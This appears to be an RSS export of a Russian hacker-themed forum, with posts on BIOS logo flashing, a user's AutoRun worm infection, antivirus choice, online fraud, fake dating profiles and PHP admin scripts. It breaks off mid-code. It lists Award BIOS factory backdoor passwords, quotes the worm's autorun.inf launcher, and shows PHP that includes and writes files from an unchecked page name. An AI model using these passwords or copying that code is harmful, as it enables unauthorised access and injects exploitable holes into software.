						&lt;p&gt;Для начала надо скачать прошивку или сохранить существующую. Получится файл с расширением «.bin» или «.awd». Чтобы узнать необходимый формат изображения, запускаем программу с таким ключом: «cbrom mybios.bin /d». Среди компонентов будет «EPA Pattern», именно он и является логотипом. Извлечение осуществляется командой «cbrom mybios.bin /epa extract». При этом надо будет задать имя файла. Чтобы выяснить формат изображения, запусти converta с ключом «converta your.logo /?». Она выдаст формат изображения. Далее готовим свою картинку в соответствии с ограничениями данного формата. Потом сохраняем картинку в BMP (16 цветов, без сжатия) в папку с converta. Теперь нужно преобразовать графический файл в форму, доступную для понимания BIOS’а. Делается это простым запуском программы с ключом, указывающим формат конвертирования: «converta mylogo.bmp /ключ». Форматы есть такие:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * /bmp— преобразование в BMP;&lt;br /&gt;&amp;#160; &amp;#160; * /mon— преобразование в монохромный формат AWARD;&lt;br /&gt;&amp;#160; &amp;#160; * /bit— преобразование в битовый формат AWARD;&lt;br /&gt;&amp;#160; &amp;#160; * /lay— преобразование в сложный формат AWARD;&lt;br /&gt;&amp;#160; &amp;#160; * /all— преобразование во все перечисленные форматы сразу.&lt;/p&gt;
						&lt;p&gt;Теперь полученное изображение надо вставить в прошивку и залить ее в CMOS. Для этого надо использовать cbrom: «cbrom mybios.bin /epa mylogo.ext».&lt;br /&gt;Выводы&lt;/p&gt;
						&lt;p&gt;Итак, замена микропрограммы – дело довольно рискованное, хотя и не такое сложное. Поэтому рекомендуем перешивать BIOS только в случае необходимости. Как показала практика, лучше всего использовать прошивки и утилиты от производителя, а процесс замены микропрограммы осуществлять из BIOS или из-под DOS.&lt;/p&gt;
						&lt;p&gt;Заводские пароли для AWARD BIOS:&lt;/p&gt;
						&lt;p&gt;AWARD_SW, TTPTHA, aPAf, HLT, lkwpeter, KDD, j262,&lt;/p&gt;
						&lt;p&gt;ZBAAACA, j322, ZAAADA, Syxz, % шесть пробелов %, Wodj,&lt;/p&gt;
						&lt;p&gt;% девять пробелов %, ZJAAADC, 01322222, j256, ?award&lt;/p&gt;
						&lt;p&gt;Для AMI BIOS таких паролей нет, но если материнская плата только куплена, можно попробовать пароль AMI.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Feb 2011 12:27:11 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=18#p18</guid>
		</item>
		<item>
			<title>как удалить неудаляемые файлы</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;В общем расклад такой&lt;br /&gt;Предистория\пролог&lt;br /&gt;Есть ноутбук, на котором есть 6 логических дисков. C: - D: - E: - F: - G: - H:, антивирусника на нём не было. Точно знаю, что были там вирусы. Форматнул диск C:, установил систему, драйвера, и... понял, интуиция или ещё как? Но понял точно, что вирусы есть всё равно, переустановка не помогла удалить их. Подключил ноут по локальному соединению к своему стационарному компу, проверил Касперским, предварительно обновив базы. Антивирус нашёл 12 опасных объекта: 6 Вирусов и 6 Троянов. На каждом диске, в корне лежало два одинаковый файла:&lt;br /&gt;Код:&lt;/p&gt;
						&lt;p&gt;autorun.inf&lt;br /&gt;u.bat&lt;/p&gt;
						&lt;p&gt;Файл autorun.inf, содержит такой код:&lt;br /&gt;Код:&lt;/p&gt;
						&lt;p&gt;;41w3DaA7oaaqi2c5diZ3AnLfS5K7dejwAKraesK78aFk0k1i3swi1LAfwak4a2w3wwll0S2worJr2qdk4ks4&lt;br /&gt;[AutoRun]&lt;br /&gt;;iAkSk4kwoj0deoqL3wK2wJJ8pic71c99kai3241wkD&lt;br /&gt;open=u.bat&lt;br /&gt;;iapsif33s3dJksS4i53wkp1swJl10ikKafDkk22KelDosAKdaw3&lt;br /&gt;shell\open\Command=u.bat&lt;br /&gt;;k&lt;br /&gt;shell\open\Default=1&lt;br /&gt;;qikLHZkasq2dpskdl4sK&lt;br /&gt;shell\explore\Command=u.bat&lt;br /&gt;;fw0&lt;/p&gt;
						&lt;p&gt;Понятно, что он запускает файл u.bat, назначение которого мне неясно, может поскольку он троян, то что-то кому-то передавать?&lt;br /&gt;Антивирус Касперского идентифицирует их как:&lt;br /&gt;Код:&lt;/p&gt;
						&lt;p&gt;вирус Worm.Win32.AutoRun.bnq	Файл: \\Alexandr\MEDIA (G)\autorun.inf&lt;br /&gt;троянская программа Trojan-PSW.Win32.OnLineGames.nhx	Файл: \\Alexandr\MEDIA (G)\u.bat&lt;/p&gt;
						&lt;p&gt;Вот скрин:&lt;/p&gt;
						&lt;p&gt;Мои действия и попытки удалить&lt;br /&gt;Удаление этих файлов антивирусом, не решает проблему, он их конечно удаляет, но они потом восстанавливаются. Данные файлы, имеют атрибуты: Скрытый, Системный, Только для чтения. Поэтому на ноуте я не могу выставить отображение скрытых и системных файлов, решение предложенное в этой теме Доступ - [решено] Помогите отобразить скрытые папки и файлы! проблему не решает. С ноута их не видно, с моего компа через локалку, я их вижу, и удаляю вручную, через секунд 15-20 они чудесным образом появляются на диске. Решил пойти таким путём, решил переименовать их, но номер не прошёл, они переименовались, но это действие было эквивалентно &amp;lt; Shift + Del &amp;gt;, всё равно по прошествии пол минуты они появляются. Следующий мой шаг был через команду:&lt;br /&gt;Код:&lt;/p&gt;
						&lt;p&gt;attrib u.bat -s -h -r&lt;/p&gt;
						&lt;p&gt;снять все атрибуты, потому что снятие через Свойства - снять галочку Только для чтения, тоже не решает, атрибуты: Скрытый, Системный, Только для чтения, восстанавливаются, хоть через командную строку, хоть через Свойства. Потом хотел изменить содержимое autorun.inf, выставив знак &amp;quot; ; &amp;quot; перед строками, что ниже, (можете смотреть, или нет), но скажу, сразу не помогло, хоть и подтверждается запись, и изменяется, но содержимое остаётся неизменным.&lt;br /&gt;читать дальше »&lt;br /&gt;Код:&lt;/p&gt;
						&lt;p&gt;;41w3DaA7oaaqi2c5diZ3AnLfS5K7dejwAKraesK78aFk0k1i3swi1LAfwak4a2w3wwll0S2worJr2qdk4ks4&lt;br /&gt;[AutoRun]&lt;br /&gt;open=u.bat&lt;br /&gt;shell\open\Command=u.bat&lt;br /&gt;shell\open\Default=1&lt;br /&gt;shell\explore\Command=u.bat&lt;/p&gt;
						&lt;p&gt;Последний ход был, скорее агоничным. Загрузился я с загрузочного CD - запуситл Volcov Commander, и в чистом DOS&#039;e, попробовал удалить их нажав клавишу F8 Delete - не удалились, выдало сообщение с выделенной буквой, для файла: (буквы которые были выделенны, тут выделены жирным курсивом)&lt;/p&gt;
						&lt;p&gt;autorun.inf&lt;br /&gt;u.bat&lt;/p&gt;
						&lt;p&gt;С перемещением вышли те же грабли... Хотел переместить в одну папку и потом грохнуть... Не судьба... Но интересно ведь, неужели я не могу их победить?! Они ничем не проявляют себя, кроме того, что эти файлы присутствуют и нельзя другие файлы отобразить если они скрытые и системные. Есть конечно вариант с форматированием всего винчестера, но это крайняя мера, поскольку там есть законодательные и бухгалтерские базы. Таблицы и документы... В связи с этим, возникают несколько вопросов:&lt;br /&gt;1. Что это за вирусы? Их назначение? (Если они только в корне диска и всё.)&lt;br /&gt;2. Насколько безопасно будет перекопировать все данные с одного компа на другой, кроме этих вирусов? (Не передадутся ли и они, как &amp;quot;бонус&amp;quot;, с копированием?)&lt;br /&gt;3. Как их всё таки удалить? (Поскольку те выделенные буквы, как будто комп не понимает имени файла, так и пишет: Bad command or name file, когда я из под DOS&#039;a, хочу их удалить, команды вводил правильно.)&lt;br /&gt;4. Возможно ли их удалить без форматирования всего винчестера?! (Как я понял, если трояны, то кроме как &amp;quot;уворовывания и слежения&amp;quot; за ноутом, у них нет другого назначения?)&lt;br /&gt;Была ещё задумка(ночью пришла), написать .cmd с таким содержимым:&lt;br /&gt;Код:&lt;/p&gt;
						&lt;p&gt;@echo off&lt;/p&gt;
						&lt;p&gt;del C:\autorun.inf&lt;br /&gt;del C:\u.bat&lt;br /&gt;del D:\autorun.inf&lt;br /&gt;del D:\u.bat&lt;br /&gt;del E:\autorun.inf&lt;br /&gt;del E:\u.bat&lt;br /&gt;del F:\autorun.inf&lt;br /&gt;del F:\u.bat&lt;br /&gt;del G:\autorun.inf&lt;br /&gt;del G:\u.bat&lt;br /&gt;del H:\autorun.inf&lt;br /&gt;del H:\u.bat&lt;/p&gt;
						&lt;p&gt;Чтобы сразу удалить все файлы во всех дисках, может тогда они не успеют восстановиться? Потому что если они где-то в другом месте ещё зарыты или как-то связаны с win.ini, то я не знаю, с локалки я туда не могу зайти, а с ноута не видно этого файла...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Feb 2011 12:14:03 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>имеет ли смысл ставить бесплатный антивирус??</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=16#p16</link>
			<description>&lt;p&gt;Платные антивирусы, конечно не панацея, но все же они более функциональны. В вопросах безопасности рисковать не стоит.&lt;br /&gt;Ну вы сами же практически и ответили на свой вопрос. Конечно, бесплатный антивирус, это намного лучше, чем вообще ничего. Но вот качество, количество обновлений, у них значительно хромает, по сравнению с платными, а значит есть риск подцепить вирус. Да и платные сейчас не так уж и дорого стоит. Мы с братом на двоих купили Касперского 2010 на год, на два компьютера за 25 долларов, то есть по 12.5 доллара на брата.У моего одного интернетного друга из Сибири стоит бесплатная антивирусная программа, по моему - Аваст. Он хвалит. Причём друг этот &amp;quot;шарит&amp;quot; в компьютерах, немного программированием увлекается. И очень даже хвалит этот антивирусник. Ещё эта же программа антивирусная стоит у моего одноклассника (в Израиле живёт), тот вообще хвалит не нахвалится Авастом. Говорит, что самая ... самая...Вот парадокс: ничего не имею против бесплатных антивирусов, но предпочитаю платный. Даже не потому, что он самый-самый, скорее, просто привычка. Что касается бесплатных антивирусов, все хвалят Avira и Avast. Недавно вышла пятая версия Avast - там много нововведений. Ещё говорят, чешский AVG хорош, но лично я не пробовал.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Feb 2011 12:07:39 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=16#p16</guid>
		</item>
		<item>
			<title>вполне легальный заработок</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=15#p15</link>
			<description>&lt;p&gt;Легальный заработок в интернете&lt;br /&gt;Легальный заработок в интернете - учимся распознавать&lt;/p&gt;
						&lt;p&gt;В интернете можно зарабатывать весьма приличные деньги совершенно различными способами, основная разница между которыми — это легальные заработки или нелегальные. Легальный заработок в интернете принципиально отличается от нелегального. И отличие это в том, что нелегальный заработок — это в первую очередь обман и развод других людей, мошенничество. То есть это такие варианты как волшебные кошельки, фишинговые сайты, хакерские атаки, взлом и воровство паролей, мошенническое доверительное управление на Форекс, и прочее, прочее, прочее... Объединяет их всех одно — попытка поживится за счет горя других людей. Разумеется, все это имеет весьма конкретные формулировки и реальные сроки в Уголовном Кодексе. Кроме того, в интернете есть так сказать, второй уровень, когда Вам предлагают приобрести методики и программы по совершению вот таких вот действий, заплатив за которые Вы естественно ничего не получите.&lt;/p&gt;
						&lt;p&gt;Так что лучше сразу браться за легальный заработок в интернете. В контексте именно легальности, такой заработок имеет следующую очень важную отличительную характеристику — деньги не делаются из воздуха, Вы получаете их за конкретные действия, причем всегда четко понятно, зачем Вы это делаете, и какую пользу (пользу правоправную, легальную) получит от Ваших действий тот, кто платит Вам деньги. Если Вы написали и продали статью — покупатель получил контент для сайта; сдали место на сайте в аренду — рекламодатель разместил на ней рекламу, либо для привлечения клиентов, либо для прокачки своего сайта; и так далее. В легальном и действительно работающем заработке, будь то в интернете или нет, этот принцип всегда соблюдается.&lt;/p&gt;
						&lt;p&gt;А если с данной точки зрения рассмотреть нелегальный заработок в интернете, то что мы видим?&lt;/p&gt;
						&lt;p&gt;А видим вот что:&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; * фишинговые сайты — грубо говоря Вы просто воруете деньги;&lt;br /&gt;&amp;#160; &amp;#160; * хакерские атаки — заказчик сего действа имеет целью завалить (не в смысле, конечно, убить, а в смысле сделать недоступным его сайт в интернете, лишь дохода, средства обмена информацией и т. д.) конкурента, и сделать это противоправными методами;&lt;br /&gt;&amp;#160; &amp;#160; * взлом кошельков, воровство паролей — все тоже воровство;&lt;br /&gt;&amp;#160; &amp;#160; * 6 кошельков, волшебные кошельки — мошенничество, просто сами останетесь без денег если поведетесь, а организуете сами.... Про УК, я думаю, повторять не стоит, и так понятно.&lt;/p&gt;
						&lt;p&gt;Конечно, здесь я описал только самые известные и набившие оскомину способы заработка в интернете, но по данному методу можно проанализировать любой предлагаемый Вам метод заработка, и сделать вывод — на сколько это легальный заработок в интернете.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Feb 2011 12:00:28 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=15#p15</guid>
		</item>
		<item>
			<title>как вычислить фейкера спросите вы?</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=14#p14</link>
			<description>&lt;p&gt;Каждый день миллионы человек в России и около миллиарда в мире взаимодействуют друг с другом через сеть. Это может быть деловая переписка, может - развлечение, а иногда - нечто среднее. Но львиная доля виртуального общения приходится на виртуальные знакомства, чаще всего между людьми разных полов. Одной из сложнейших проблем в этой сфере является выявление &amp;quot;фиктивных&amp;quot; собеседников. Что имеется в виду?&lt;/p&gt;
						&lt;p&gt;Один из первых ресурсов, столкнувшихся с этой проблемой, является всем хорошо известный контакт. Дело в том, что была выявлена закономерность: красивые девушки пользуются там огромной популярностью и просто живут в роскоши. Им постоянно дарят голоса, подарки, делают пиар мужчины. И нашлись мошенники, которые начали создавать фиктивные анкеты сексуальных девушек, сидеть под ними и разводить парней, которые хотят познакомиться с &amp;quot;милой леди&amp;quot; на разные платные вещи. Фейки также встречаются на сайтах знакомств, других социальных сетях и даже в ICQ!&lt;/p&gt;
						&lt;p&gt;Как выяснить, общаетесь ли вы с настоящей девушкой или фейком? Психологи подметили несколько особенностей, выдающих их. Во-первых, подделка всегда старается вам доказать, что она не такая. Настоящая девушка никогда не озабочена тем, чтобы доказать миру, что она не фейк. Например, в контакте фейки любят выкладывать фото, видео, аудиозаписи, которые подтверждают, что они настоящие, а также в заметках размещать ссылки на анкеты, которые, якобы, являются их фейками. Во-вторых, фейки не дают номер телефона или если дают, то не берут трубку. В-третьих, они не боятся заявлять о своих сексуальных предпочтениях, и им нравится то же самое, что мужчинам.&lt;/p&gt;
						&lt;p&gt;Самое главное: не переводите девушкам ничего ценного - голосов, подарков, денег на счёт - пока не получите неопровержимых доказательств, что девушка настоящая! Одним из возможных критериев является просьба сделать сигну. Сигны на теле с именами, сделанные оперативно и бесплатно (помните: фейки получают голоса и сматывают удочки!) являются лучшими свидетельствами подлинности собеседницы.&lt;/p&gt;
						&lt;p&gt;Надеюсь, эти советы вам помогут. Будьте бдительны!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (SMOKED)</author>
			<pubDate>Mon, 07 Feb 2011 11:52:11 +0300</pubDate>
			<guid>https://xakerzone.bbeasy.ru/viewtopic.php?pid=14#p14</guid>
		</item>
		<item>
			<title>бесплатные джава скрипты</title>
			<link>https://xakerzone.bbeasy.ru/viewtopic.php?pid=13#p13</link>
			<description>&lt;p&gt;Я, администратор данного сайта, являюсь вебмастером уже более 3х лет. Любой вебмастер, если он подходит к своему делу серьёзно, то создаёт не простые html странички, а старается идти дальше и пытается усложнять свою работу. Так появляются сначала простенькие функции калькулятора (калькулятор на PHP скрипте) на домашней страничке, затем на сайте появляется автоматический вывод информации на экран с помощью всё тех же написанных PHP скриптов, и так проекты постепенно усложняются по функционалу. За 3 года у меня накопилось очень много и чужих и своих PHP скриптов. Я решил, что чем они будут пылиться на компьютере, пусть ими пользуются другие - так и появилась идея создания данного сайта. Здесь в основном представлены бесплатные PHP скрипты, но есть и платные - это самые дорогие мне скрипты, над которыми проделана очень большая работа.&lt;/p&gt;
						&lt;p&gt;Пользуйтесь и на своих проектах моими скриптами:) &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; Php скрипт редактирования страниц сайта также необязательный его элемент. Наверняка проще и надежнее изменять и редактировать страницы на локальном компе в старом добром Dreamweaver, а затем просто переносить их на сервер посредством ftp соединения. Но поскольку раздел админпанели php сайта уже начат, то будет правильно довести его до логического конца, во всяком случае хотя-бы основные ее элементы. Проект нашего динамического сайта построен очень гибко с точки зрения формирования собственно страниц сайта. Упор сделан на максимальное удобство их написания. Поэтому страницы имеют обычное расширение .html, а управляет загрузкой страниц в шаблон простейший шаблонизатор в паре с соответствующим php скриптом который и загружает нужную страницу в шаблон в нужное место. Вообщем сколько страниц столько и php скриптов загружчиков. В простейшем случае вообще можно в самом скрипте загружчике и писать текст самой страницы. Но, как уже обсуждалось в самом начале раздела пошагового создания сайта на php это сразу лишит юзера многих выгод. Поэтому наш комплексный подход к проекту облегчает жизнь не только сайтостроителю, но и самому движку сайта. Скрипты загружчики в основном повторяющие названия файлов самих страниц ведь могут выполнять еще много дополнительных функций, как например постройка графики, статистики, да и элементы администрирования. И разделение проекта на шаблон, шаблонизатор, элементарные движки и сами .html страницы только на пользу всего php движка.&lt;/p&gt;
						&lt;p&gt;Теперь с точки зрения администрирования, тоесть редактирования страниц сайта, коечно-же полезно будет предусмотреть возможность редактирования не только самих html страниц, но php движков приданных к ним, а также страниц мета ключевиков и описаний. На базе всего выше описанного админка с редактированием страниц ничего особенного из себя не представляет. Для редактирования той или иной страницы необходимо, после входа в админку просто ее открыть и перейти по ссылке ее редактирования, которая откроет ее еще и в форме редактирования из которой открытую страницу можно просто перезаписать. Вот и вся музыка. Ниже по тексту небольшой участок такого php скрипта.&lt;/p&gt;
						&lt;p&gt;&amp;lt;?php&lt;/p&gt;
						&lt;p&gt;//--------------------------------------------------------------------------------&lt;br /&gt;// Редактирование страниц сайта &lt;/p&gt;
						&lt;p&gt;if($submit == &#039;Сохранить php&#039;)&lt;br /&gt;{&lt;br /&gt;&amp;#160; &amp;#160; $tmpphp =&amp;#160; PHPPAGES.&amp;quot;$PageName.php&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; // положить отредактированный файл на свое место без обратных слэшей &lt;br /&gt;&amp;#160; &amp;#160; file_put_contents(&amp;quot;$tmpphp&amp;quot;, stripslashes($messagephp), LOCK_EX);&lt;br /&gt;}&lt;br /&gt;elseif($submit == &#039;Сохранить html&#039;)&lt;br /&gt;{&lt;br /&gt;&amp;#160; &amp;#160; $tmphtml =&amp;#160; HTMLPAGES.&amp;quot;$PageName.html&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; file_put_contents(&amp;quot;$tmphtml&amp;quot;, $messagehtml, LOCK_EX);&lt;br /&gt;}&lt;br /&gt;elseif($submit == &#039;Сохранить meta&#039;)&lt;br /&gt;{&lt;br /&gt;&amp;#160; &amp;#160; $tmpmeta =&amp;#160; HTMLMETAPAGES.&amp;quot;$PageName&amp;quot;.&amp;quot;_meta.html&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; file_put_contents(&amp;quot;$tmphtml&amp;quot;, $messagemeta, LOCK_EX);&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;$textphp = file_get_contents(PHPPAGES.&amp;quot;$PageName.php&amp;quot;);&lt;br /&gt;$texthtml = file_get_contents(HTMLPAGES.&amp;quot;$PageName.html&amp;quot;);&lt;br /&gt;$textmeta = file_get_contents(HTMLMETAPAGES.&amp;quot;$PageName&amp;quot;.&amp;quot;_meta.html&amp;quot;);&lt;/p&gt;
						&lt;p&gt;// Формирование запрошенной страницы&lt;br /&gt;include (PHPPAGES.&amp;quot;$PageName.php&amp;quot;);&lt;/p&gt;
						&lt;p&gt;//--------------------------------------------------------------------------------&lt;/p&gt;
						&lt;p&gt;?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Для того, чтобы проследить все действия выполняемые в скрипте редактирования страниц сайта на практике, нужно заменить предыдущий скрипт проекта на новый, выполнив не только полную синхронизацию, но и команду put. Далее необходимо запустить локальный сервер, набрать в браузере mysitephp.ru, войти в админпалель (логин -login, пароль - pass) и проверить в работе проект со скриптом редактирования страниц сайта на борту. &lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;Php скрипт редактирования рекламных блоков почти один к одному должен быть похож на скрипт редактирования страниц сайта. Чтобы выяснить, что это должно быть именно так необходимо выяснить как-же в нашем проекте можно размещать рекламные блоки в выбранных местах шаблона. Это несложно. Поскольку большинство рекламных скриптов написаны на яве, то достаточно всего-лишь поместить скрипт в нужное место шаблона, как он заработает сразу после загрузки шаблона в браузер. Но такой путь будет ошибочен, поскольку редактирование рекламных блоков будет предполагать редактирование самого шаблона, что нам совершенно ни к чему. Само собой напрашивается выход. Ява, или любые другие в том числе и php блоки рекламы записывать в отдельные файлы, которые подгружать в шаблон, каждый в нужное выбранное место, а лучше вообще разместить все рекламные блоки в оди файл, который кстати затем можно изменять и редактировать непосредственно из админпанели. Ниже и представлен небольшой скрипт содержащий заготовки рекламных блоков.&lt;/p&gt;
						&lt;p&gt;&amp;lt;?php&lt;/p&gt;
						&lt;p&gt;/*&lt;br /&gt;// поиск по сайту от Google&lt;br /&gt;$googlesearch=&amp;lt;&amp;lt;&amp;lt;gsearch&lt;/p&gt;
						&lt;p&gt;&amp;lt;div class=&#039;reklams_468&#039;&amp;gt;&lt;br /&gt;&amp;#160; &amp;#160; &amp;lt;img height=60 width=468 alt=&amp;quot;Я скрипт поиска по сайту живу в php/ad.php&amp;quot;&amp;gt;&lt;br /&gt;&amp;lt;/div&amp;gt;&lt;/p&gt;
						&lt;p&gt;gsearch;&lt;br /&gt;*/&lt;/p&gt;
						&lt;p&gt;// горизонтальный баннер от Google&lt;br /&gt;$add_468_60=&amp;lt;&amp;lt;&amp;lt;gorizont&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;img height=60 width=468 alt=&amp;quot;Я баннер 468*60, живу в php/ad.php&amp;quot;&amp;gt;&lt;/p&gt;
						&lt;p&gt;gorizont;&lt;/p&gt;
						&lt;p&gt;// вертикальный баннер от Google&lt;br /&gt;$add_120_600=&amp;lt;&amp;lt;&amp;lt;right&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;img height=600 width=120 alt=&amp;quot;Я баннер 120*600, живу в php/ad.php&amp;quot;&amp;gt;&lt;/p&gt;
						&lt;p&gt;right;&lt;/p&gt;
						&lt;p&gt;// вертикальный баннер от Google&lt;br /&gt;$add_120_90=&amp;lt;&amp;lt;&amp;lt;left&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; &amp;lt;img height=90 width=120 alt=&amp;quot;Я баннер 120*90, живу в php/ad.php&amp;quot;&amp;gt;&lt;/p&gt;
						&lt;p&gt;left;&lt;/p&gt;
						&lt;p&gt;?&amp;gt;&lt;/p&gt;
						&lt;p&gt;Работу и редактирование скрипта в составе нашего проэкта php сайта можно проследить на базе самого обновленного проекта. Далее, как обычно необходимо выполнить не только полную синхронизацию, но и команду put. Далее запускаем локальный сервер, набраем в браузере mysitephp.ru, входим в админпалель (логин -login, пароль - pass) и проверяем на практике все, что описано выше.&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &lt;br /&gt;&amp;#160; &amp;#160; &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;Php скрипт добавления и редактирования разделов главного меню сайта наверняка будет одним из основных скриптов админпанели. На первых порах он должен выполнять функции формирования новых и редактирования существующих разделов рубрик php меню. В дальнейшем этот php скрипт обязан будет выполнять и функцию формирования дефолтовых страниц разделов и страниц их мета описания с последующим их редактированием. Ниже представлена одна из частей скрипта отвечающая за добавление новых разделов в выбранных рубриках. Все управление в этой части осуществляется в админпанели путем выбора действия по соответствующей ссылке на странице редактирования меню.&lt;/p&gt;
						&lt;p&gt;&amp;lt;?php&lt;/p&gt;
						&lt;p&gt;//----------------------------------------------------------------------------&lt;br /&gt;// Изменения и удаления в меню&lt;br /&gt;if($design == &#039;удалить&#039; or $design == &#039;изменить&#039;)&lt;br /&gt;{&lt;br /&gt;&amp;#160; &amp;#160; $cont2 = str_replace (&amp;quot; &amp;quot;,&amp;quot;_&amp;quot;,$cont2);&lt;br /&gt;&amp;#160; if(preg_match (&amp;quot;~[а-яА-Я]~&amp;quot;,$cont2))&lt;br /&gt;&amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; $error = &#039;yes&#039;; &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; $text_admin = &amp;quot;&amp;lt;b&amp;gt;Ошибка:&amp;lt;/b&amp;gt; в ссылках не должно быть русских букв!!!&amp;lt;br&amp;gt;\n&amp;quot;;&lt;br /&gt;&amp;#160; }&lt;br /&gt;&amp;#160; if ($error != &#039;yes&#039; and $ParName[1] == &#039;rub&#039;)&lt;br /&gt;&amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; $general = @file ($general_file);&lt;br /&gt;&amp;#160; &amp;#160; $lines = count($general);&lt;br /&gt;&amp;#160; &amp;#160; $fp = @fopen($general_file,&#039;w&#039;);&lt;br /&gt;&amp;#160; &amp;#160; for ($i=0; $i&amp;lt; $lines; $i++)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; list($menu_link,$menu_name,$menu_title)=explode(&amp;quot;::&amp;quot;, $general[$i]);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; if($cont_abs2 == $menu_link)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; if($design == &#039;изменить&#039;)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; @fwrite ($fp,&amp;quot;$cont2::$cont3::$cont4::\n&amp;quot;);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; }&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; else{@fwrite ($fp,$general[$i]);}&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160;}&amp;#160; &lt;br /&gt;&amp;#160; &amp;#160; @fclose ($fp); &lt;br /&gt;&amp;#160; &amp;#160; &amp;#160;}&lt;br /&gt;&amp;#160; elseif ($error != &#039;yes&#039; and $ParName[1] == &#039;part&#039;)&lt;br /&gt;&amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; $general = @file ($general_file);&lt;br /&gt;&amp;#160; &amp;#160; $lines = count($general);&lt;br /&gt;&amp;#160; &amp;#160; $fp = @fopen($general_file,&#039;w&#039;);&lt;br /&gt;&amp;#160; &amp;#160; for ($i=0; $i&amp;lt; $lines; $i++)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; list($menu_link,$menu_name,$menu_title,$menu_file)=explode(&amp;quot;::&amp;quot;, $general[$i]);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $arrln=explode(&amp;quot;_&amp;quot;,$menu_link);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $cntln = count ($arrln);&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $cont5 = $arrln[$cntln - 1];&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $cfl = $cont5;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $cont5 = &amp;quot;data/&amp;quot;.&amp;quot;$cont5.dat&amp;quot;;&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; if($cont_abs2 == $menu_link)&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; {&lt;br /&gt;&amp;#160; &amp;#160; &amp;#160; &amp;#160; &amp;#160; $tmphtml =&amp;#160; HTMLPAGES.&amp;quot;$cfl.html&amp;quot;;&lt;br 